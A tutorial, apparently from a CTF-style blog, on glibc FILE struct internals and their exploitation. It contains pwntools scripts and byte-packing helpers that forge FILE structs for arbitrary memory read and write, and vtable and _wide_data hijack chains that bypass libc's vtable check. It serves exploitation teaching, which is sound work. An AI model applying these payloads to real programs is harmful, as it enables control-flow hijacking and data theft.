File Struct

2025-04-07

1. What is a File Descriptor
- 1.1 open,read,write
- 1.2 fopen,fread,fwrite
2. What is a File Struct
3. file struct exploit
- 3.1 Arbitrary Address Write
  - 3.1.1 Theory
  - 3.1.2 Example
- 3.2 Arbitrary Address Read
  - 3.2.1 Theory
  - 3.2.2 Example
4. file struct in C++
- 4.1 What is a vtable
- 4.2 vtable exploitation (historical)
- 4.3 vtable exploitation (current)

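1. What is a File Descriptor

A file descriptor usually refers to the value returned by open when it opens a file:

int fd = open("/home/wsxk/test.txt", O_RDWR);
printf("%d\n", fd);

As this shows, a file descriptor is just an integer; it is an index.
Each process has a process file table maintained in kernel space. The file descriptor is an index into that table, and each entry holds a pointer into the Global File Table, which stores the kernel's descriptor structure for the open file.
With this interface, every operation traps into the kernel and pays for a user/kernel mode switch, so issuing many small read/write calls is expensive.
libc offers another set of file functions, fopen, fread and fwrite, that handle the same operations faster. How does it manage that?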

1.1 open,read,write

Consider this example:

#include <stdio.h>
#include <sys/fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
int main(){
    char buf[0x1000];
    int fd = open("/dev/urandom",O_RDONLY);
    for(int i=0;i<50000;i++){
        read(fd,buf,0x20);
    }
    return 0;
}

strace ./read_loop 2>&1 | grep -E "^read" | wc -l
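# strace ./read_loop: trace the system calls made by read_loop
# 2>&1: strace writes to standard error, so redirect it to standard output for grep
# | grep -E "^read": use an extended regular expression to keep lines that start with read
# | wc -l: count the matching lines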

1.2 fopen,fread,fwrite

#include <stdio.h>
#include <sys/fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
int main(){
    char buf[0x1000];
    FILE * file = fopen("/dev/urandom","r");
    for(int i=0;i<50000;i++){
        fread(buf,1,0x20,file);
    }
    return 0;
}

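Counting read system calls the same way for both programs makes the difference obvious.
fread issues far fewer system calls, which is why it is so much faster.

2. What is a File Struct

The fread family in libc works on a file struct rather than a bare file descriptor. The file struct holds the buffer pointers used by read/write, which cuts the number of transitions into the kernel and improves I/O performance.
The file struct is defined at https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/bits/types/struct_FILE.h#L49
Note that both the file struct and its buffer live in user space, which is one of the preconditions for the exploitation described later.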

/* The tag name of this struct is _IO_FILE to preserve historic
   C++ mangled names for functions taking FILE* arguments.
   That name should not be used in new code.  */
struct _IO_FILE
{
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */

  /* The following pointers correspond to the C++ streambuf protocol. */
  char *_IO_read_ptr;	/* Current read pointer */
  char *_IO_read_end;	/* End of get area. */
  char *_IO_read_base;	/* Start of putback+get area. */
  char *_IO_write_base;	/* Start of put area. */
  char *_IO_write_ptr;	/* Current put pointer. */
  char *_IO_write_end;	/* End of put area. */
  char *_IO_buf_base;	/* Start of reserve area. */
  char *_IO_buf_end;	/* End of reserve area. */

  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
  int _flags2;
  __off_t _old_offset; /* This used to be _offset but it's too small.  */

  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

struct _IO_FILE_complete
{
  struct _IO_FILE _file;
#endif
  __off64_t _offset;
  /* Wide character stream stuff.  */
  struct _IO_codecvt *_codecvt;
  struct _IO_wide_data *_wide_data;
  struct _IO_FILE *_freeres_list;
  void *_freeres_buf;
  size_t __pad5;
  int _mode;
  /* Make sure we don't get into trouble again.  */
  char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
};
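
As a quick check on the layout above, the following sketch computes member offsets with ordinary C alignment rules. It assumes x86-64 Linux (4-byte int, 8-byte pointers and offsets) and a build without _IO_USE_OLD_IO_FILE; the FIELDS table and the layout helper are illustrative names, and the results should be verified against the target libc.

```python
# (name, size, alignment) for each member, assuming x86-64 Linux (LP64).
FIELDS = [
    ("_flags", 4, 4),
    ("_IO_read_ptr", 8, 8), ("_IO_read_end", 8, 8), ("_IO_read_base", 8, 8),
    ("_IO_write_base", 8, 8), ("_IO_write_ptr", 8, 8), ("_IO_write_end", 8, 8),
    ("_IO_buf_base", 8, 8), ("_IO_buf_end", 8, 8),
    ("_IO_save_base", 8, 8), ("_IO_backup_base", 8, 8), ("_IO_save_end", 8, 8),
    ("_markers", 8, 8), ("_chain", 8, 8),
    ("_fileno", 4, 4), ("_flags2", 4, 4), ("_old_offset", 8, 8),
    ("_cur_column", 2, 2), ("_vtable_offset", 1, 1), ("_shortbuf", 1, 1),
    ("_lock", 8, 8), ("_offset", 8, 8), ("_codecvt", 8, 8),
    ("_wide_data", 8, 8), ("_freeres_list", 8, 8), ("_freeres_buf", 8, 8),
    ("__pad5", 8, 8), ("_mode", 4, 4),
    ("_unused2", 15 * 4 - 4 * 8 - 8, 1),  # same expression as the C source
]

def layout(fields):
    """Return ({name: offset}, total_size) using ordinary C alignment rules."""
    offsets, pos, max_align = {}, 0, 1
    for name, size, align in fields:
        pos = (pos + align - 1) // align * align  # pad up to the member's alignment
        offsets[name] = pos
        pos += size
        max_align = max(max_align, align)
    total = (pos + max_align - 1) // max_align * max_align
    return offsets, total

OFFSETS, SIZE = layout(FIELDS)
for name in ("_IO_buf_base", "_fileno", "_lock", "_wide_data"):
    print(f"{name:14s} at {OFFSETS[name]:#x}")
print(f"sizeof(struct _IO_FILE) = {SIZE:#x}")
```

Under these assumptions the struct is 0xd8 bytes long, so a pointer placed directly after it (such as the vtable discussed in section 4) sits at offset 0xd8.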

2.1 Reading from File to Memory

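Reading from a file actually reads from the buffer, as the figure shows.
Once the buffer has been fully consumed, _IO_read_ptr is reset to _IO_read_base and a system call refills the buffer from the file.
If the file is shorter than the buffer, only part of the buffer is filled, as the second figure shows.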
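
The refill behaviour can be modelled in a few lines. This is a toy simulation rather than glibc code: ReadBufferModel is a hypothetical class, integer indices stand in for the char* members, and the 4096-byte buffer size is an assumption.

```python
class ReadBufferModel:
    """Toy model of the FILE read buffer; indices stand in for the char* fields."""

    def __init__(self, source: bytes, buf_size: int = 4096):
        self.source = source      # stands in for the file contents
        self.file_pos = 0         # kernel-side file offset
        self.buf = b""            # bytes between read_base and read_end
        self.read_ptr = 0         # offset of _IO_read_ptr from _IO_read_base
        self.buf_size = buf_size  # assumed buffer size
        self.syscalls = 0         # number of simulated read(2) calls

    def _refill(self):
        """One simulated read(2): reset read_ptr to read_base and refill."""
        self.syscalls += 1
        self.buf = self.source[self.file_pos:self.file_pos + self.buf_size]
        self.file_pos += len(self.buf)
        self.read_ptr = 0

    def fread(self, n: int) -> bytes:
        out = b""
        while len(out) < n:
            if self.read_ptr == len(self.buf):  # read_ptr == read_end: buffer used up
                self._refill()
                if not self.buf:                # nothing left in the file
                    break
            take = min(n - len(out), len(self.buf) - self.read_ptr)
            out += self.buf[self.read_ptr:self.read_ptr + take]
            self.read_ptr += take
        return out

# Same access pattern as the loop in section 1.2: 50000 reads of 0x20 bytes.
model = ReadBufferModel(bytes(50000 * 0x20))
for _ in range(50000):
    model.fread(0x20)
print("simulated read syscalls:", model.syscalls)
```

In this model the 50000 small reads cost a few hundred refills instead of 50000 system calls, and a source shorter than the buffer simply produces a partially filled buffer.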

2.2 Writing from Memory to File

Writing to a file actually writes into the buffer, as the figure shows.
Once the buffer is full, _IO_write_ptr is reset to _IO_write_base and a system call writes the buffer contents out to the file.
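
The write side can be sketched the same way. Again this is a toy model under assumptions: WriteBufferModel is a hypothetical class, and a bytearray stands in for the region between _IO_write_base and _IO_write_ptr.

```python
class WriteBufferModel:
    """Toy model of the FILE write buffer."""

    def __init__(self, buf_size: int = 4096):
        self.buf = bytearray()    # bytes between write_base and write_ptr
        self.buf_size = buf_size  # write_end - write_base
        self.sink = bytearray()   # stands in for the file on disk
        self.syscalls = 0         # number of simulated write(2) calls

    def flush(self):
        """One simulated write(2), then write_ptr goes back to write_base."""
        if self.buf:
            self.syscalls += 1
            self.sink += self.buf
            self.buf.clear()

    def fwrite(self, data: bytes):
        while data:
            room = self.buf_size - len(self.buf)
            self.buf += data[:room]   # copy as much as fits into the buffer
            data = data[room:]
            if len(self.buf) == self.buf_size:
                self.flush()          # buffer full: push it to the file

w = WriteBufferModel(buf_size=8)
w.fwrite(b"abcdefghij")
print(w.syscalls, bytes(w.sink), bytes(w.buf))
```

With an 8-byte buffer, the first eight bytes reach the sink in a single simulated system call and the remaining two stay buffered until the next flush.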

2.3 File Struct in Detail

2.3.1 _flags

The flag values are defined at https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libio.h#L62

int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */
// Literally: the high 2 bytes identify the structure as a file struct
#define _IO_MAGIC         0xFBAD0000 /* Magic number */
// The low 2 bytes hold the individual flags
#define _IO_UNBUFFERED        0x0002 // Buffering is disabled; behaves essentially like open/read/write
#define _IO_NO_READS          0x0004 /* Reading not allowed.  */
#define _IO_NO_WRITES         0x0008 /* Writing not allowed.  */
#define _IO_CURRENTLY_PUTTING 0x0800
#define _IO_IS_APPENDING      0x1000
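
When inspecting a file struct in a debugger it helps to decode _flags mechanically. The sketch below only knows the flags listed above; decode_flags is a hypothetical helper, and the sample value is made up for illustration.

```python
_IO_MAGIC = 0xFBAD0000
_IO_MAGIC_MASK = 0xFFFF0000  # selects the high 2 bytes

# Only the flags quoted in this section; glibc defines more.
FLAG_NAMES = {
    0x0002: "_IO_UNBUFFERED",
    0x0004: "_IO_NO_READS",
    0x0008: "_IO_NO_WRITES",
    0x0800: "_IO_CURRENTLY_PUTTING",
    0x1000: "_IO_IS_APPENDING",
}

def decode_flags(flags: int):
    """Return (has_magic, [names of the known flags that are set])."""
    has_magic = (flags & _IO_MAGIC_MASK) == _IO_MAGIC
    names = [name for bit, name in FLAG_NAMES.items() if flags & bit]
    return has_magic, names

print(decode_flags(0xFBAD0808))
```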

2.3.2 Buffer Pointers

These are the buffer pointers already described in 2.1 and 2.2.

/* The following pointers correspond to the C++ streambuf protocol. */
char *_IO_read_ptr;	/* Current read pointer */
char *_IO_read_end;	/* End of get area. */
char *_IO_read_base;	/* Start of putback+get area. */
char *_IO_write_base;	/* Start of put area. */
char *_IO_write_ptr;	/* Current put pointer. */
char *_IO_write_end;	/* End of put area. */
char *_IO_buf_base;	/* Start of reserve area. */
char *_IO_buf_end;	/* End of reserve area. */

2.3.3 _fileno

This is simply the file descriptor of the underlying file.

int _fileno;

3. file struct exploit

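File struct exploitation rests on one assumption: an attacker who controls the buffer pointers in a file struct gains arbitrary read and write.

3.1 Arbitrary Address Write

If we control a file struct, we can modify some of its members so that data is written to an address of our choosing:

3.1.1 Theory

Set flag value  -> usually 0x0000
Set read_ptr = read_end  -> usually read_ptr = read_end = 0x0
Set buf_base to address to write   -> buf_base = memory
Set buf_end to address to write + length -> buf_end = memory+length
buf_end - buf_base >= number of bytes to read -> this only constrains length; to be safe, pick a length larger than the number of bytes fread requests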

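Why does an arbitrary write go through fread?
fread reads from the file descriptor into the file struct's buffer.
The key step is that we also set _fileno to 0x0 (stdin), so fread reads our input from stdin into the buffer.
For the input to land exactly in the buffer we chose, read_ptr must equal read_end; fread then treats the buffer as empty and resets the read pointers.
So when fread is called, the following happens:

read_base, read_ptr and read_end are reset to buf_base
read is called on stdin with room for buf_end - buf_base bytes; the input is stored at read_base and read_end advances by the number of bytes received, repeating until fread has the size*num bytes it asked for
the data is then copied from read_base into fread's buf argument

That completes the arbitrary write: our input has been written to the address we installed as the buffer.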
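
The field settings above can be packed by hand to see exactly which bytes are sent. This is a minimal sketch assuming the x86-64 offsets of glibc 2.31 (_IO_read_ptr 0x08, _IO_read_end 0x10, _IO_buf_base 0x38, _IO_buf_end 0x40, _fileno 0x70); fake_file_for_write is a hypothetical helper, not part of any library.

```python
import struct

def fake_file_for_write(target: int, length: int) -> bytes:
    """Bytes to overwrite a FILE with so that fread() stores stdin data at target."""
    fake = bytearray(0x74)                              # up to and including _fileno
    struct.pack_into("<I", fake, 0x00, 0x0000)          # _flags
    struct.pack_into("<Q", fake, 0x08, 0)               # _IO_read_ptr
    struct.pack_into("<Q", fake, 0x10, 0)               # _IO_read_end == _IO_read_ptr
    struct.pack_into("<Q", fake, 0x38, target)          # _IO_buf_base
    struct.pack_into("<Q", fake, 0x40, target + length) # _IO_buf_end
    struct.pack_into("<i", fake, 0x70, 0)               # _fileno = stdin
    return bytes(fake)

payload = fake_file_for_write(0x404040, 0x20)  # 0x404040 is a made-up address
print(len(payload), payload.hex())
```

The payload stops right after _fileno so that later members such as _lock keep the values fopen gave them; zeroing them would likely crash before the write happens.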

3.1.2 Example

#include <stdio.h>
#include <unistd.h>

int win_var = 0;

void win(){
    puts("you win");
}
int main(){
    char buf[256];

    printf("global win_var addr: %p\n",&win_var);
    FILE * file = fopen("./secret","r");
    read(0,file,0x100);
    puts("calling fread!");
    fread(buf,1,10,file);

    if(win_var){
        win();
    }
}

from pwn import *
context.arch = 'amd64'
context.os = 'linux'
context.log_level = 'debug'

p = process("./arbitrary_write")
p.recvuntil(b"addr: ")
win_var_addr = int(p.recvline().strip(b"\n"),16)
log.success(f"win_var_addr: {hex(win_var_addr)}")

# overwrite the file struct
fp =FileStructure()
payload = fp.read(win_var_addr,0x20)
print(payload)
print(fp)
p.send(payload)

p.recvuntil(b"fread")
p.send(b"a"*10)
p.interactive()

3.2 Arbitrary Address Read

If we control a file struct, we can modify some of its members so that data is read out from an address of our choosing:

3.2.1 Theory

Set flag value  -> usually 0x0800
Set write_base to the memory to leak -> write_base = memory
Set write_ptr to the address to leak + length -> write_ptr = memory+length
Set read_end = write_base -> read_end = memory; this is needed to pass a check in the write path

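Here we set _fileno in the file struct to 1, i.e. stdout.
fwrite then sends the buffer contents to stdout.
So a call to fwrite does the following:

The buffer is considered full (because write_end is 0), so the bytes from write_base to write_ptr are written to stdout
Because write_end is 0 there is effectively no buffer, so write_ptr and write_base are both set to 0
The contents of fwrite's buf argument are written directly to stdout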
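
The corresponding bytes for the read primitive can be packed by hand as well. This sketch assumes the x86-64 offsets of glibc 2.31 (_IO_read_end 0x10, _IO_write_base 0x20, _IO_write_ptr 0x28, _fileno 0x70); fake_file_for_read is a hypothetical helper and the address is made up.

```python
import struct

def fake_file_for_read(target: int, length: int) -> bytes:
    """Bytes to overwrite a FILE with so that fwrite() dumps memory at target."""
    fake = bytearray(0x74)                              # up to and including _fileno
    struct.pack_into("<I", fake, 0x00, 0x0800)          # _flags: _IO_CURRENTLY_PUTTING
    struct.pack_into("<Q", fake, 0x10, target)          # _IO_read_end == _IO_write_base
    struct.pack_into("<Q", fake, 0x20, target)          # _IO_write_base
    struct.pack_into("<Q", fake, 0x28, target + length) # _IO_write_ptr
    struct.pack_into("<Q", fake, 0x30, 0)               # _IO_write_end = 0: buffer looks full
    struct.pack_into("<i", fake, 0x70, 1)               # _fileno = stdout
    return bytes(fake)

payload = fake_file_for_read(0x402010, 0x10)  # 0x402010 is a made-up address
print(len(payload), payload.hex())
```

As with the write primitive, the payload ends after _fileno so that _lock and the members behind it are left untouched.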

3.2.2 Example

#include <stdio.h>
#include <unistd.h>

char * secret_message = "flag{wsxkwsxk}";

int main(){
    printf("secret_message: %p\n",secret_message);

    FILE * file = fopen("/dev/null","w");
    read(0,file,0x100);

    char buf[256];
    puts("calling fwrite");
    fwrite(buf,1,0x10,file);

    return 0;
}

from pwn import *
context.arch = 'amd64'
context.os = 'linux'
context.log_level = 'debug'

p = process("./arbitrary_read")
p.recvuntil(b": ")
secret_value_leak = int(p.recvline().strip(b"\n"),16)
log.success(f"secret_value_leak: {hex(secret_value_leak)}")

# overwrite the file struct
fp =FileStructure()
payload = fp.write(secret_value_leak,0x10)
print(fp)
p.send(payload)
p.interactive()

4. file struct in C++

To support C++-style overriding, libc extends the file struct slightly:

struct _IO_FILE_plus
{
  FILE file;
  const struct _IO_jump_t *vtable;
};

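As you can see, the extension adds just one member: vtable

4.1 What is a vtable

A vtable is an array of function pointers.
vtables are common in C++ binaries.
They let the function to call be resolved at run time, which is how overriding is usually implemented.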
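
The idea of dispatching through a table at call time can be shown with a small analogy. This is not how glibc stores its tables; Stream and the two jump tables are hypothetical names chosen for the illustration.

```python
def file_xsputn(data):
    return f"file write: {data}"

def str_xsputn(data):
    return f"string write: {data}"

# Each "vtable" maps a slot name to a function.
FILE_JUMPS = {"__xsputn": file_xsputn}
STR_JUMPS = {"__xsputn": str_xsputn}

class Stream:
    def __init__(self, vtable):
        self.vtable = vtable

    def write(self, data):
        # The target is looked up in the table when the call happens.
        return self.vtable["__xsputn"](data)

s = Stream(FILE_JUMPS)
print(s.write("hello"))
s.vtable = STR_JUMPS   # swapping the table changes which function runs
print(s.write("hello"))
```

The second call shows why the pointer matters to an attacker: whoever controls the table reference controls which function the same call site reaches.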

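4.2 vtable exploitation (historical)

When fwrite runs, it normally calls the __xsputn entry of file->vtable (by default _IO_new_file_xsputn, the function pointer stored at vtable+0x38), so if we control that value we can hijack control flow.
The approach is:

Create your own vtable structure, exploit_vtable

Fill exploit_vtable with suitable values; everything else can be arbitrary
1 set exploit_vtable+0x38 to the function you want to call

Overwrite file_struct
1 _IO_lock_t *_lock must point to a writable region whose value is 0
      _lock is the lock that protects the stream against race conditions between threads, so it cannot be a null pointer. Set _IO_lock_t *_lock to the address you prepared
2 vtable = exploit_vtable

Call fwrite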
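
The steps above can be sketched as two byte strings. The offsets are assumptions for x86-64 glibc (_lock at 0x88, vtable at 0xd8, the fwrite slot at vtable+0x38); build_old_vtable_hijack and all addresses are hypothetical, and every other field is left zero for brevity, which a real target may not tolerate.

```python
import struct

def build_old_vtable_hijack(exploit_vtable_addr: int, lock_addr: int, target: int):
    """Return (exploit_vtable bytes, fake file_struct bytes)."""
    exploit_vtable = bytearray(0x40)
    struct.pack_into("<Q", exploit_vtable, 0x38, target)      # slot fwrite calls

    fake_file = bytearray(0xe0)                               # FILE plus vtable pointer
    struct.pack_into("<Q", fake_file, 0x88, lock_addr)        # _lock: writable, holds 0
    struct.pack_into("<Q", fake_file, 0xd8, exploit_vtable_addr)  # vtable
    return bytes(exploit_vtable), bytes(fake_file)

# Made-up addresses for illustration only.
vt, ff = build_old_vtable_hijack(0x404100, 0x404200, 0x401136)
print(vt.hex())
print(ff.hex())
```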

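4.3 vtable exploitation (current)

Modern libc adds a protection that defeats the old technique: the vtable pointer is validated before use.
libc keeps its vtables in a dedicated region (the vtable area), and the check fails with an error if vtable does not point into that region.
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libioP.h#L935
The idea now is to keep vtable pointing into the vtable area but change its value so that vtable+0x38 resolves to _IO_wfile_overflow. That function calls _IO_wdoallocbuf internally, which then uses file_struct->_wide_data (a structure similar to a file struct that carries its own vtable, and that vtable is used without validation) and ends up calling the function pointer stored at file_struct->_wide_data->_wide_vtable+0x68.
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/libio.h#L121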

struct _IO_wide_data
{
  wchar_t *_IO_read_ptr;	/* Current read pointer */
  wchar_t *_IO_read_end;	/* End of get area. */
  wchar_t *_IO_read_base;	/* Start of putback+get area. */
  wchar_t *_IO_write_base;	/* Start of put area. */
  wchar_t *_IO_write_ptr;	/* Current put pointer. */
  wchar_t *_IO_write_end;	/* End of put area. */
  wchar_t *_IO_buf_base;	/* Start of reserve area. */
  wchar_t *_IO_buf_end;		/* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  wchar_t *_IO_save_base;	/* Pointer to start of non-current get area. */
  wchar_t *_IO_backup_base;	/* Pointer to first valid character of
				   backup area */
  wchar_t *_IO_save_end;	/* Pointer to end of non-current get area. */

  __mbstate_t _IO_state;
  __mbstate_t _IO_last_state;
  struct _IO_codecvt _codecvt;

  wchar_t _shortbuf[1];

  const struct _IO_jump_t *_wide_vtable;
};

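Create your own structures: exploit_vtable, exploit_vtable2 and wide_data

Fill exploit_vtable with suitable values; everything else can be arbitrary
1 exploit_vtable+0x38 must hold the function you want called first, here _IO_wfile_overflow. In practice you simply locate an existing table in libc.

Fill exploit_vtable2 with suitable values; everything else can be arbitrary
1 exploit_vtable2+0x68 is the function you want to call

Fill wide_data with suitable values; everything else can be arbitrary
1 the value at wide_data+0xe0 must be exploit_vtable2

Overwrite file_struct
1 _IO_lock_t *_lock must point to a writable region whose value is 0
      _lock is the lock that protects the stream against race conditions between threads, so it cannot be a null pointer. Set _IO_lock_t *_lock to the address you prepared
2 _wide_data = wide_data
3 vtable = exploit_vtable

Call fwrite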
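
The chain above can be sketched as follows. Everything here is an assumption to verify against the target libc: the x86-64 offsets (_lock 0x88, _wide_data 0xa0, vtable 0xd8), the position of the __overflow entry at 0x18 inside a jump table, and the choice of _IO_wfile_jumps as the existing table to borrow. build_wide_chain and all addresses are hypothetical.

```python
import struct

OVERFLOW_SLOT = 0x18    # assumed offset of the __overflow entry in a jump table
XSPUTN_SLOT = 0x38      # slot that fwrite dispatches through
DOALLOCATE_SLOT = 0x68  # slot called through _wide_vtable
LOCK_OFF, WIDE_DATA_OFF, VTABLE_OFF = 0x88, 0xa0, 0xd8
WIDE_VTABLE_OFF = 0xe0  # _wide_vtable inside struct _IO_wide_data

def build_wide_chain(wfile_jumps, wide_data_addr, vtable2_addr, lock_addr, target):
    # Shift the pointer so that exploit_vtable+0x38 lands on _IO_wfile_overflow.
    exploit_vtable = wfile_jumps + OVERFLOW_SLOT - XSPUTN_SLOT

    exploit_vtable2 = bytearray(DOALLOCATE_SLOT + 8)
    struct.pack_into("<Q", exploit_vtable2, DOALLOCATE_SLOT, target)

    wide_data = bytearray(WIDE_VTABLE_OFF + 8)
    struct.pack_into("<Q", wide_data, WIDE_VTABLE_OFF, vtable2_addr)

    fake_file = bytearray(VTABLE_OFF + 8)
    struct.pack_into("<Q", fake_file, LOCK_OFF, lock_addr)           # _lock
    struct.pack_into("<Q", fake_file, WIDE_DATA_OFF, wide_data_addr) # _wide_data
    struct.pack_into("<Q", fake_file, VTABLE_OFF, exploit_vtable)    # vtable
    return exploit_vtable, bytes(exploit_vtable2), bytes(wide_data), bytes(fake_file)

# Made-up addresses for illustration only.
vt, vt2, wd, ff = build_wide_chain(0x7ffff7fc0f60, 0x404300, 0x404400, 0x404200, 0x401136)
print(hex(vt))
```

All remaining fields are left zero in this sketch; whether that satisfies the checks inside _IO_wfile_overflow and _IO_wdoallocbuf depends on the libc version and should be confirmed in a debugger.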